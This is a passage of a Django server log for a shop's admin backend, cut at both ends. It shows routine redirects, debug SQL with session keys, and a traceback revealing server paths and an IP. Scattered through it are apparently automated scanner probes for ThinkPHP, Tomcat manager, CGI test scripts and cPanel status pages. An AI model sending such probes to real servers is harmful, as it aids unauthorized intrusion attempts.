HTTP/1.0" 302 0 [14/Dec/2019 08:05:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:15:07] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:22:28] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:27:31] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:33:40] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:49:16] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:54:19] "GET / HTTP/1.0" 302 0 [14/Dec/2019 08:59:21] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:06:35] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:15:36] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:20:38] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:25:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:42:32] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:47:34] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:52:37] "GET / HTTP/1.0" 302 0 [14/Dec/2019 09:59:22] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [14/Dec/2019 09:59:45] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [14/Dec/2019 09:59:47] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=113 HTTP/1.0" 404 6705 Not Found: /newslist.asp [14/Dec/2019 09:59:48] "GET /newslist.asp?type=4&id=1302 HTTP/1.0" 404 6649 [14/Dec/2019 10:05:02] "GET /whm-server-status HTTP/1.0" 301 0 [14/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:17:00] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:22:13] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [14/Dec/2019 10:27:11] "POST /editBlackAndWhiteList HTTP/1.0" 500 63822 [14/Dec/2019 10:30:40] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:35:43] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:40:29] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:40:45] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:45:48] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:50:50] "GET / HTTP/1.0" 302 0 [14/Dec/2019 10:55:53] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:04:19] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:15:07] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:20:09] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:27:14] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:35:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:45:46] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:52:40] "GET / HTTP/1.0" 302 0 [14/Dec/2019 11:52:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:00:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:05:04] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:07:04] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [14/Dec/2019 12:07:48] "GET /TP/public/index.php HTTP/1.0" 404 6650 [14/Dec/2019 12:07:53] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:10:07] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:16:06] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [14/Dec/2019 12:17:28] "GET /robots.txt HTTP/1.0" 404 6623 [14/Dec/2019 12:17:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 12:17:29,171 utils 20136 140506411554560 (0.011) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'vlr2nsk8j4f5ky083q8gk1b9ny9bklfj' LIMIT 1; args=('vlr2nsk8j4f5ky083q8gk1b9ny9bklfj',) DEBUG 2019-12-14 12:17:29,174 utils 20136 140506411554560 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('vlr2nsk8j4f5ky083q8gk1b9ny9bklfj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T12:17:29.172270+00:00'::timestamptz); args=('vlr2nsk8j4f5ky083q8gk1b9ny9bklfj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 12, 17, 29, 172270, tzinfo=)) [14/Dec/2019 12:17:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 12:17:32] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [14/Dec/2019 12:17:33] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [14/Dec/2019 12:17:33] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [14/Dec/2019 12:17:34] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [14/Dec/2019 12:24:19] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:30:40] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:35:43] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:40:46] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [14/Dec/2019 12:45:27] "GET /proxy.php HTTP/1.0" 404 6629 [14/Dec/2019 12:45:48] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:50:09] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [14/Dec/2019 12:50:16] "GET /manager/html HTTP/1.0" 404 6629 [14/Dec/2019 12:50:51] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:52:23] "GET / HTTP/1.0" 302 0 [14/Dec/2019 12:55:54] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:05:02] "GET /whm-server-status HTTP/1.0" 301 0 [14/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:15:23] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 13:19:11,028 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '83uvzhrdddzp5dqx9e4xj3rno6fofo39' LIMIT 1; args=('83uvzhrdddzp5dqx9e4xj3rno6fofo39',) DEBUG 2019-12-14 13:19:11,030 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('83uvzhrdddzp5dqx9e4xj3rno6fofo39', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T13:19:11.029253+00:00'::timestamptz); args=('83uvzhrdddzp5dqx9e4xj3rno6fofo39', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 13, 19, 11, 29253, tzinfo=)) [14/Dec/2019 13:19:11] "GET /login/?next=/%3FC%3DM%3BO%3DA HTTP/1.0" 200 1810 [14/Dec/2019 13:20:24] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:21:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 13:21:05,462 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '81ztkcnfa49ver0tvcngqqlm4pzsmnp2' LIMIT 1; args=('81ztkcnfa49ver0tvcngqqlm4pzsmnp2',) DEBUG 2019-12-14 13:21:05,464 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('81ztkcnfa49ver0tvcngqqlm4pzsmnp2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T13:21:05.462806+00:00'::timestamptz); args=('81ztkcnfa49ver0tvcngqqlm4pzsmnp2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 13, 21, 5, 462806, tzinfo=)) [14/Dec/2019 13:21:05] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 13:21:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 13:21:07,574 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sk82qp7lnydz2l6urfr9rm6fefm6qo4w' LIMIT 1; args=('sk82qp7lnydz2l6urfr9rm6fefm6qo4w',) DEBUG 2019-12-14 13:21:07,576 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sk82qp7lnydz2l6urfr9rm6fefm6qo4w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T13:21:07.574897+00:00'::timestamptz); args=('sk82qp7lnydz2l6urfr9rm6fefm6qo4w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 13, 21, 7, 574897, tzinfo=)) [14/Dec/2019 13:21:07] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 13:21:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 13:21:09,109 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2q09x5tzcgyw7m2aofj36bzjoyvcddea' LIMIT 1; args=('2q09x5tzcgyw7m2aofj36bzjoyvcddea',) DEBUG 2019-12-14 13:21:09,111 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2q09x5tzcgyw7m2aofj36bzjoyvcddea', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T13:21:09.110239+00:00'::timestamptz); args=('2q09x5tzcgyw7m2aofj36bzjoyvcddea', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 13, 21, 9, 110239, tzinfo=)) [14/Dec/2019 13:21:09] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 13:24:21] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:25:29] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:30:32] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [14/Dec/2019 13:45:47] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:50:49] "GET / HTTP/1.0" 302 0 [14/Dec/2019 13:55:53] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:05:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:15:08] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:20:11] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:25:14] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:30:17] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:34:12] "GET /WSMAN HTTP/1.0" 301 0 [14/Dec/2019 14:36:11] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:36:58] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:42:01] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:47:04] "GET / HTTP/1.0" 302 0 [14/Dec/2019 14:55:49] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:17:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:22:51] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:28:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:45:47] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [14/Dec/2019 15:50:50] "GET / HTTP/1.0" 302 0 [14/Dec/2019 15:55:53] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:07:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:18:00] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:23:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:28:06] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:35:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:45:47] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:50:50] "GET / HTTP/1.0" 302 0 [14/Dec/2019 16:55:53] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:20:43] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:25:48] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [14/Dec/2019 17:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:40:46] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:46:03] "GET / HTTP/1.0" 302 0 Not Found: // [14/Dec/2019 17:50:23] "GET // HTTP/1.0" 404 6596 Not Found: //cgi-sys/realsignup.cgi [14/Dec/2019 17:50:23] "GET //cgi-sys/realsignup.cgi HTTP/1.0" 404 6662 Not Found: //cgi-bin/test-cgi [14/Dec/2019 17:50:23] "GET //cgi-bin/test-cgi HTTP/1.0" 404 6644 Not Found: //cgi-bin/test.cgi [14/Dec/2019 17:50:23] "GET //cgi-bin/test.cgi HTTP/1.0" 404 6644 [14/Dec/2019 17:50:24] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:54:39] "GET / HTTP/1.0" 302 0 [14/Dec/2019 17:59:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 18:07:34,338 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v1hd1lnec1g9dv82ac9f2ihfxrvn98zk' LIMIT 1; args=('v1hd1lnec1g9dv82ac9f2ihfxrvn98zk',) DEBUG 2019-12-14 18:07:34,340 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v1hd1lnec1g9dv82ac9f2ihfxrvn98zk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T18:07:34.338790+00:00'::timestamptz); args=('v1hd1lnec1g9dv82ac9f2ihfxrvn98zk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 18, 7, 34, 338790, tzinfo=)) [14/Dec/2019 18:07:34] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 18:10:06] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:10:30] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:16:18] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:21:21] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:26:23] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:32:54] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:38:59] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:44:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:49:04] "GET / HTTP/1.0" 302 0 [14/Dec/2019 18:56:51] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:05:16] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:10:19] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:15:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:20:24] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:25:27] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:30:30] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:35:42] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [14/Dec/2019 19:40:27] "HEAD /robots.txt HTTP/1.0" 404 6627 [14/Dec/2019 19:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:45:47] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:50:50] "GET / HTTP/1.0" 302 0 [14/Dec/2019 19:55:53] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:05:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:20:11] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:25:14] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:30:17] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [14/Dec/2019 20:30:36] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [14/Dec/2019 20:30:36] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [14/Dec/2019 20:30:37] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [14/Dec/2019 20:30:37] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [14/Dec/2019 20:30:38] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [14/Dec/2019 20:30:38] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [14/Dec/2019 20:30:39] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [14/Dec/2019 20:30:39] "GET /index.php HTTP/1.0" 404 6620 [14/Dec/2019 20:30:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 20:30:40,608 utils 20136 140506411554560 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9esz0k82yrg93tutvenofnh9zubcoiid' LIMIT 1; args=('9esz0k82yrg93tutvenofnh9zubcoiid',) DEBUG 2019-12-14 20:30:40,611 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9esz0k82yrg93tutvenofnh9zubcoiid', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T20:30:40.609341+00:00'::timestamptz); args=('9esz0k82yrg93tutvenofnh9zubcoiid', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 20, 30, 40, 609341, tzinfo=)) [14/Dec/2019 20:30:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 20:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:45:50] "GET / HTTP/1.0" 302 0 [14/Dec/2019 20:50:53] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 20:54:03,660 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '906pnvrnj0o3a8jdez7mwv6l2pj37n6a' LIMIT 1; args=('906pnvrnj0o3a8jdez7mwv6l2pj37n6a',) DEBUG 2019-12-14 20:54:03,663 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('906pnvrnj0o3a8jdez7mwv6l2pj37n6a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T20:54:03.661579+00:00'::timestamptz); args=('906pnvrnj0o3a8jdez7mwv6l2pj37n6a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 20, 54, 3, 661579, tzinfo=)) [14/Dec/2019 20:54:03] "GET /login/?next=/%3FC%3DD%3BO%3DA HTTP/1.0" 200 1810 [14/Dec/2019 20:55:56] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:05:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:15:08] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:24:01] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:29:04] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:33:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 21:33:43,741 utils 20136 140506411554560 (0.007) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hqe3y2eatve3j1mbx1ywlpuojbz70mfd' LIMIT 1; args=('hqe3y2eatve3j1mbx1ywlpuojbz70mfd',) DEBUG 2019-12-14 21:33:43,745 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hqe3y2eatve3j1mbx1ywlpuojbz70mfd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T21:33:43.742694+00:00'::timestamptz); args=('hqe3y2eatve3j1mbx1ywlpuojbz70mfd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 21, 33, 43, 742694, tzinfo=)) [14/Dec/2019 21:33:43] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 21:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:44:17] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:45:57] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:54:31] "GET / HTTP/1.0" 302 0 [14/Dec/2019 21:59:34] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:00:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 22:00:18,040 utils 20136 140506411554560 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yima4t9hh0e1lzve67lxswibjq8tl57f' LIMIT 1; args=('yima4t9hh0e1lzve67lxswibjq8tl57f',) DEBUG 2019-12-14 22:00:18,043 utils 20136 140506411554560 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yima4t9hh0e1lzve67lxswibjq8tl57f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T22:00:18.041157+00:00'::timestamptz); args=('yima4t9hh0e1lzve67lxswibjq8tl57f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 22, 0, 18, 41157, tzinfo=)) [14/Dec/2019 22:00:18] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 22:05:02] "GET /whm-server-status HTTP/1.0" 301 0 [14/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:12:47] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:17:49] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:22:52] "GET / HTTP/1.0" 302 0 [14/Dec/2019 22:23:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 22:23:57,192 utils 20136 140506411554560 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'g1l6nf7kagbekgyq0vbiwbms7dg9h2nh' LIMIT 1; args=('g1l6nf7kagbekgyq0vbiwbms7dg9h2nh',) DEBUG 2019-12-14 22:23:57,194 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('g1l6nf7kagbekgyq0vbiwbms7dg9h2nh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T22:23:57.193304+00:00'::timestamptz); args=('g1l6nf7kagbekgyq0vbiwbms7dg9h2nh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 22, 23, 57, 193304, tzinfo=)) [14/Dec/2019 22:23:57] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-12-14 22:23:58,666 utils 20136 140506411554560 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-14 22:23:58,679 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-14 22:23:58,686 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-14 22:23:58,690 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-14 22:23:58,696 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-14 22:23:58,700 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY 